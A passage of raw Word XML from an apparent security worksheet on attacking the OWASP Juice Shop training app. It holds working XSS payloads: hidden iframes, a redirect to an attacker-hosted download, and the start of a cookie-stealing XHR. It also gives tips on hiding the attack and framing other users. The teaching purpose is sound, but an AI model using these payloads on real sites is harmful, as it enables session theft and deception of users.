          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http.setRequestHeader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">('Content-Type', 'application/json'); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http.setRequestHeader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">('Authorization', 'Bearer ' + token); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JSON.stringify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>({'ProductId':2, 'BasketId':'1', 'quantity':1}));"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6378CEBC" w14:textId="1AA4741B" w:rsidR="00755294" w:rsidRDefault="00755294" w:rsidP="00950BE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>We can run this</w:t>
      </w:r>
      <w:r w:rsidR="00A22B2B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reflected XSS by pasting this payload into the search bar – to make it persistent, follow the steps from before by wrapping the </w:t>
      </w:r>
      <w:r w:rsidR="0040612A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>payload in a script tag so that when it’s sanitised the iframe is all that remains!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3206F053" w14:textId="633E2EC9" w:rsidR="009705F4" w:rsidRDefault="009705F4" w:rsidP="00950BE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Note: lots of examples of XHR requests online </w:t>
      </w:r>
      <w:r w:rsidR="007609CE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">include a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007609CE" w:rsidRPr="003C474C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http.onreadystatechange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007609CE" w:rsidRPr="003C474C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007609CE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>function in their code, which does something when a response is received. While this is useful for debugging, we don’t want to include it in our code as it will potentially alert the user to what has just happened!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EC4683" w14:textId="77777777" w:rsidR="00C0732F" w:rsidRPr="00755294" w:rsidRDefault="00C0732F" w:rsidP="00950BE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71363284" w14:textId="693B7A45" w:rsidR="00621C47" w:rsidRDefault="00955466" w:rsidP="00950BE7">
      <w:r>
        <w:t xml:space="preserve">5.3) </w:t>
      </w:r>
      <w:r w:rsidR="00621C47">
        <w:t xml:space="preserve">To do this you can edit your payload to include a style tag in the iframe. Good options include </w:t>
      </w:r>
      <w:r w:rsidR="00621C47" w:rsidRPr="00125727">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>width: 1px</w:t>
      </w:r>
      <w:r w:rsidR="00621C47">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00621C47" w:rsidRPr="00125727">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00621C47" w:rsidRPr="00125727">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>height: 1px</w:t>
      </w:r>
      <w:r w:rsidR="00621C47">
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00621C47" w:rsidRPr="00125727">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>display:hidden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00621C47">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CD6792">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00165C25">
        <w:t>For the most basic XSS in the search bar, the</w:t>
      </w:r>
      <w:r w:rsidR="00CD6792">
        <w:t xml:space="preserve"> payload now looks like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CEA6F3" w14:textId="509E115D" w:rsidR="00165C25" w:rsidRPr="00485266" w:rsidRDefault="00165C25" w:rsidP="00950BE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485266">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;iframe </w:t>
      </w:r>
      <w:r w:rsidR="00A06415" w:rsidRPr="00485266">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>style</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A06415" w:rsidRPr="00485266">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=“</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A06415" w:rsidRPr="00485266">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">width: 1px; height: 1px; display: none;” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A06415" w:rsidRPr="00485266">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A06415" w:rsidRPr="00485266">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A06415" w:rsidRPr="00485266">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A06415" w:rsidRPr="00485266">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A06415" w:rsidRPr="00485266">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A06415" w:rsidRPr="00485266">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>’);”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234A4845" w14:textId="4544DCA3" w:rsidR="00955466" w:rsidRDefault="00DA25AA" w:rsidP="00950BE7">
      <w:r>
        <w:t>While we’re</w:t>
      </w:r>
      <w:r w:rsidR="006B25AC">
        <w:t xml:space="preserve"> covering our tracks, we can even submit feedback as another </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006B25AC">
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006B25AC">
        <w:t xml:space="preserve"> so it looks like the persistent XSS came from their account!</w:t>
      </w:r>
      <w:r w:rsidR="00023C7E">
        <w:t xml:space="preserve"> We can do this either by editing the email in the request</w:t>
      </w:r>
      <w:r w:rsidR="00975E78">
        <w:t xml:space="preserve"> using Burp (which you should know how to do by now)</w:t>
      </w:r>
      <w:r w:rsidR="00023C7E">
        <w:t xml:space="preserve"> or</w:t>
      </w:r>
      <w:r w:rsidR="00975E78">
        <w:t xml:space="preserve"> by</w:t>
      </w:r>
      <w:r w:rsidR="00023C7E">
        <w:t xml:space="preserve"> logging in as a compromised user and posting the feedback directly</w:t>
      </w:r>
      <w:r w:rsidR="0086149A">
        <w:t xml:space="preserve"> from their account.</w:t>
      </w:r>
      <w:r w:rsidR="005812BE">
        <w:t xml:space="preserve"> As we’ve found so many ways to compromise Juice Shop, we can do almost any combination of these things!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC84CE4" w14:textId="5B3AC36F" w:rsidR="00AF2358" w:rsidRDefault="00AF2358" w:rsidP="00950BE7"/>
    <w:p w14:paraId="2B80157A" w14:textId="74D9B5D7" w:rsidR="004723FA" w:rsidRDefault="00AF2358" w:rsidP="00950BE7">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4) </w:t>
      </w:r>
      <w:r w:rsidR="00055B87">
        <w:t>To do this, you need to host a ‘malicious’ file on your server</w:t>
      </w:r>
      <w:r w:rsidR="002F0CF3">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002F0CF3">
        <w:t>we’ve</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002F0CF3">
        <w:t xml:space="preserve"> simply created a .txt file with a ‘You’ve been hacked’ message</w:t>
      </w:r>
      <w:r w:rsidR="00055B87">
        <w:t xml:space="preserve">. If </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00055B87">
        <w:t>you’re</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00055B87">
        <w:t xml:space="preserve"> using the Python</w:t>
      </w:r>
      <w:r w:rsidR="0067213D">
        <w:t xml:space="preserve"> code I wrote at [5], you need to place this file in the same directory as the simple-python-server.py </w:t>
      </w:r>
      <w:r w:rsidR="0036740B">
        <w:t xml:space="preserve">file. Then run the server using </w:t>
      </w:r>
      <w:r w:rsidR="0036740B" w:rsidRPr="00B77864">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>python3 simple-python-server.py -l localhost -p 8000</w:t>
      </w:r>
      <w:r w:rsidR="002D5546" w:rsidRPr="00782C6C">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (you will need Python</w:t>
      </w:r>
      <w:r w:rsidR="008C3437">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> [6]</w:t>
      </w:r>
      <w:r w:rsidR="002D5546" w:rsidRPr="00782C6C">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> installed)</w:t>
      </w:r>
      <w:r w:rsidR="0036740B" w:rsidRPr="00782C6C">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00B77864">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="0036740B" w:rsidRPr="00B77864">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Localhost</w:t>
      </w:r>
      <w:r w:rsidR="00B77864">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="0036740B" w:rsidRPr="00B77864">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> specifies that the server runs on our local machine, which is good enough for this worksheet, but if you</w:t>
      </w:r>
      <w:r w:rsidR="000E696B" w:rsidRPr="00B77864">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> have your own server that is internet-accessible, then the following steps for the exploit will be the same!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377AB75D" w14:textId="1FFEA9D3" w:rsidR="00476FBD" w:rsidRDefault="00DF3044" w:rsidP="00476FBD">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07C5B5DC" wp14:editId="215ECA5E">
            <wp:extent cx="5731510" cy="31718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71825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D403E9B" w14:textId="5F414EF7" w:rsidR="00476FBD" w:rsidRPr="00B77864" w:rsidRDefault="00476FBD" w:rsidP="00476FBD">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005C53D9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Creating a 'malicious' file and starting the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A27786" w14:textId="64EC9FED" w:rsidR="004723FA" w:rsidRDefault="00483392" w:rsidP="00950BE7">
      <w:r>
        <w:t>We want to create an XSS payload that requests the file we have created</w:t>
      </w:r>
      <w:r w:rsidR="000520E2">
        <w:t xml:space="preserve">. To do this, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000520E2">
        <w:t>let’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000520E2">
        <w:t xml:space="preserve"> make a redirect similar to the one before, but that </w:t>
      </w:r>
      <w:r w:rsidR="00482A9C">
        <w:t>redirects to localhost instead</w:t>
      </w:r>
      <w:r w:rsidR="00143B40">
        <w:t xml:space="preserve"> – we should specify the full </w:t>
      </w:r>
      <w:r w:rsidR="00143B40">
        <w:lastRenderedPageBreak/>
        <w:t>URL path, and the file we want to download</w:t>
      </w:r>
      <w:r w:rsidR="008971F7">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DE3BFE">
        <w:t xml:space="preserve"> For ease of testing, this payload </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DE3BFE">
        <w:t>isn’t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DE3BFE">
        <w:t xml:space="preserve"> persistent – but it’s easy enough to make it persistent by wrapping in a </w:t>
      </w:r>
      <w:r w:rsidR="00DE3BFE" w:rsidRPr="00FD1FD8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00DE3BFE" w:rsidRPr="00FD1FD8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE3BFE">
        <w:t xml:space="preserve">tag, as in </w:t>
      </w:r>
      <w:r w:rsidR="00FD1FD8">
        <w:t>5.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05247CD1" w14:textId="17284D98" w:rsidR="00482A9C" w:rsidRDefault="00482A9C" w:rsidP="00507A30">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;iframe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>javascript:window.top</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>.location.href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ‘</w:t>
      </w:r>
      <w:r w:rsidR="00B52CE8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="009F5555">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>localhost:8000/</w:t>
      </w:r>
      <w:r w:rsidR="00202F34">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>important-info</w:t>
      </w:r>
      <w:r w:rsidR="00F64F0B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009F5555">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:r w:rsidR="004C02EA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527A8856" w14:textId="77777777" w:rsidR="00507A30" w:rsidRPr="00507A30" w:rsidRDefault="00507A30" w:rsidP="00507A30">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="786855DC" w14:textId="25E9A4F9" w:rsidR="00AF2358" w:rsidRDefault="009F283E" w:rsidP="00950BE7">
      <w:r>
        <w:t>Calling your file something like important-info.txt might make people more likely to accept a download, if prompted!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49617199" w14:textId="77777777" w:rsidR="00955466" w:rsidRDefault="00955466" w:rsidP="00950BE7"/>
    <w:p w14:paraId="5AC34866" w14:textId="0739CCAE" w:rsidR="003A1990" w:rsidRPr="00CE601E" w:rsidRDefault="003A1990" w:rsidP="00950BE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00FC3D79">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00026D9C">
        <w:t xml:space="preserve"> The following code, adapted from [</w:t>
      </w:r>
      <w:r w:rsidR="000B7616">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00026D9C">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="008B720B">
        <w:t xml:space="preserve">, sends </w:t>
      </w:r>
      <w:r w:rsidR="006D4EE7">
        <w:t xml:space="preserve">a POST request using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C2FD5">
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidR="006D4EE7">
        <w:t>avascript</w:t>
      </w:r>
      <w:r w:rsidR="008C2FD5">
        <w:t>’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C2FD5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C2FD5">
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C2FD5">
        <w:t xml:space="preserve"> class</w:t>
      </w:r>
      <w:r w:rsidR="00B126F0">
        <w:t xml:space="preserve"> (also known as XHR),</w:t>
      </w:r>
      <w:r w:rsidR="007154FE">
        <w:t xml:space="preserve"> with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008C2FD5" w:rsidRPr="008C2FD5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B126F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B126F0">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>supplied as a request parameter.</w:t>
      </w:r>
      <w:r w:rsidR="00647863">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0C0943"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//create XML HTTP Request (XHR) object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CC4B32"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 xml:space="preserve">var http = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
